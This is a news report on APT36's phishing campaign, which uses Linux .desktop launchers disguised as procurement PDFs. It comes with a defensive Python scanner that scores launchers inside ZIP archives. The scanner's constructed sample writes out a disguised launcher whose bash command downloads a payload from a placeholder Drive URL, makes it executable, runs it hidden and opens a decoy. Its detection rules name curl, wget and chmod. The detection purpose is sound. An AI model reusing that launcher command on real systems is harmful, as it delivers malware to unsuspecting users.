Pakistan-linked hacking group APT36, active since 2013, has launched a new cyberespionage campaign against Indian government and defense sectors. Known for tailoring its lures to its targets, APT36 now delivers malware through Linux .desktop files, the plain-text launcher files that normally back application shortcuts: the Exec= key of a launcher runs whatever command it names when the user opens the file, so a launcher styled as a document can run an arbitrary shell command. The launchers arrive in phishing emails disguised as procurement documents.
The malicious files are hidden in ZIP archives. When opened, the launcher fetches a dropper from Google Drive and displays a decoy PDF so the victim sees the document they expected. Once running, the malware establishes persistence, evades detection, and connects to its command-and-control servers over WebSockets.
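The delivery chain above gives a defender a concrete artifact to inspect: a .desktop launcher whose Exec= line downloads and runs a payload and then opens a document. The following Python is an added example written for this page, not code from the article, CloudSEK or Cyfirma. It unpacks a ZIP in memory, parses every .desktop member, and scores the Exec= command against heuristics that match the described behaviour (downloader, cloud-drive URL, shell wrapper, chmod, decoy document, hidden directory, backgrounding, and a document extension in the launcher's display name). The sample archive, its URL, file names, rule set and scoring weights are constructed here for illustration and are not indicators from the campaign.

```python
"""Heuristic scanner for .desktop launchers delivered inside ZIP archives.

Added example; not code from the article, CloudSEK or Cyfirma. The sample
archive built below is constructed for illustration, and the URL, file names,
rules and thresholds are assumptions, not indicators from the campaign.
"""
import configparser
import io
import re
import zipfile

# Each rule: (name, regex applied to the Exec= command string). Assumed set.
EXEC_RULES = [
    ("downloader", re.compile(r"\b(curl|wget)\b")),
    ("cloud_drive_url", re.compile(r"drive\.google\.com|docs\.google\.com", re.I)),
    ("shell_wrapper", re.compile(r"\b(ba)?sh\s+-c\b")),
    ("chmod_exec", re.compile(r"\bchmod\s+\+?x\b|\bchmod\s+[0-7]*7[0-7]*\b")),
    ("decoy_open", re.compile(r"\bxdg-open\b.*\.pdf\b", re.I)),
    ("hidden_dir", re.compile(r"/\.[A-Za-z0-9_-]+/")),
    ("backgrounded", re.compile(r"\bnohup\b|&\s*$|\bdisown\b")),
]
DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?)$", re.I)


def parse_desktop(text):
    """Return the [Desktop Entry] section as a dict, or None if the text is
    not a launcher. Keys keep their case; '%' field codes are not expanded."""
    cp = configparser.RawConfigParser(interpolation=None, strict=False)
    cp.optionxform = str
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    if not cp.has_section("Desktop Entry"):
        return None
    return dict(cp.items("Desktop Entry"))


def score_entry(entry):
    """Apply the rules to one launcher; return (score, matched rule names)."""
    cmd = entry.get("Exec", "")
    hits = [name for name, rx in EXEC_RULES if rx.search(cmd)]
    # A launcher whose display name ends in a document extension is trying
    # to pass as a file rather than an application.
    if DOC_EXT.search(entry.get("Name", "")):
        hits.append("doc_extension_in_name")
    score = len(hits)
    # Fetching from the network and handing the result to a shell is the core
    # of the described chain, so that combination is weighted extra.
    if "downloader" in hits and "shell_wrapper" in hits:
        score += 2
    return score, hits


def scan_zip(data, threshold=3):
    """Walk a ZIP held in memory and return a finding per .desktop member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".desktop"):
                continue
            entry = parse_desktop(zf.read(info).decode("utf-8", "replace"))
            if entry is None:
                continue
            score, hits = score_entry(entry)
            findings.append({
                "member": info.filename,
                "name": entry.get("Name", ""),
                "type": entry.get("Type", ""),
                "exec": entry.get("Exec", ""),
                "score": score,
                "hits": hits,
                "suspicious": score >= threshold,
            })
    return findings


def build_sample_zip():
    """Constructed sample: a 'procurement' archive holding one lookalike
    launcher and one ordinary launcher. The URL and paths are placeholders."""
    launcher = (
        "[Desktop Entry]\n"
        "Type=Application\n"
        "Name=Procurement_Notice.pdf\n"
        "Icon=application-pdf\n"
        "Terminal=false\n"
        'Exec=bash -c "curl -sL https://drive.google.com/uc?id=EXAMPLE '
        "-o ~/.cache/.upd && chmod +x ~/.cache/.upd && "
        'nohup ~/.cache/.upd >/dev/null 2>&1 & xdg-open ~/.cache/decoy.pdf"\n'
    )
    benign = "[Desktop Entry]\nType=Application\nName=Calculator\nExec=gnome-calculator\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Procurement_Notice.pdf.desktop", launcher)
        zf.writestr("calc.desktop", benign)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip(build_sample_zip()):
        flag = "SUSPICIOUS" if finding["suspicious"] else "ok"
        print(f"{flag:10} {finding['member']} score={finding['score']} hits={finding['hits']}")
```

Pointing `scan_zip` at a real attachment means reading the bytes from the mail gateway's quarantine rather than calling `build_sample_zip`; the threshold is deliberately low because a launcher that merely downloads and executes, with no decoy at all, should still be flagged.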
Security firms CloudSEK and Cyfirma highlight this shift as a sign of growing sophistication, with APT36 adapting its tooling to Linux environments and expanding its reach beyond India. The campaign combines traditional Windows malware with mobile implants, signaling a broader strategy to infiltrate hardened systems.